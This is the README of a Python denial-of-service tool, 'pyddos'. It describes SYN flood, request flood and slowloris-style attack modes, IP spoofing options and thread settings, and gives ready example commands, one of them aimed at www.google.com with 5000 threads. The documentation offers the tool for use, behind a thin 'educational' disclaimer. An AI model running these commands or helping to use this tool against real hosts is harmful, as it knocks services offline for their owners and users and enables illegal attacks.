- This is my new update
- This script have 3 type of ddos attacks : SYNFLOOD | REQUEST | Pyslow
- Script has pyslow attack type which is similar to slowloris attack
- I wrote this script for educational not for destructive purposes and illegal actions, so I won't be responsible for that
- termcolor
- colorama
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DDos python script | Script used for testing ddos | Ddos attack
Author: ___T7hM1___
Github: http://github.com/t7hm1/pyddos
usage: python3 pyddos.py -d [target] -p [port] -T [number threads]
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-d <ip|domain> Specify your target such an ip or domain name
-t <float> Set timeout for socket
-T <int> Set threads number for connection (default = 1000)
-p <int> Specify port target (default = 80) |Only required with pyslow attack|
-s <int> Set sleep time for reconnection
-i <ip address> Specify spoofed ip unless use fake ip
-Request Enable request target
-Synflood Enable synflood attack
-Pyslow Enable pyslow attack
--fakeip Option to create fake ip if not specify spoofed ip
python3 pyddos.py -d www.example.com -p 80 -T 2000 -Pyslow
python3 pyddos.py -d www.domain.com -s 100 -Request
python3 pyddos.py -d www.google.com -Synflood -T 5000 -t 10.0